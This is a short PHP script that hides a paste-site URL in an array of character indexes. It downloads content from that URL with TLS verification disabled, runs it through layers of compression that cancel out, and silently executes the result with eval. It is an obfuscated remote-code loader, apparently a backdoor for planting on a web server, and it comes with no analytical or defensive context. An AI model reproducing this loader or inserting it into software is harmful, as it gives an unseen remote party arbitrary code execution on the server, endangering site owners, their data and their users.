<?php

 $characters = array_merge(range('a', 'z'), range('A', 'Z'), range('0', '9'), ['.', ':', '/', '_', '-']);
 $indexArray = [7,19,19,15,18,63,64,64,1,8,13,62,12,20,3,5,8,18,7,62,13,4,19,64,17,64,54,58,61,66,55,52,56,58,66,60,54,53,55];
 $decodedString = '';
foreach ($indexArray as $index) {
    $decodedString .= $characters[$index];
}
 $url = "$decodedString";
function fetchContent($url) { 
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    $content = curl_exec($ch);
    curl_close($ch);
    return gzdeflate(gzcompress(gzdeflate(gzcompress(gzdeflate(gzcompress(gzdeflate(gzcompress($content))))))));
}
@eval("?>".gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(fetchContent($url))))))))));
?>
